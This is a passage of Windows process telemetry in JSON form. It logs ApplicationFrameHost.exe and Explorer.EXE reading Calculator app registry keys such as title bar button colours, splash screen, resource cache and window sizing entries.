"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SplashScreen", - "registry_value": "SplashScreen", - "timestamp": 131883573248080000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248230000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573248230000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredMinSize", - "registry_value": "PreferredMinSize", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 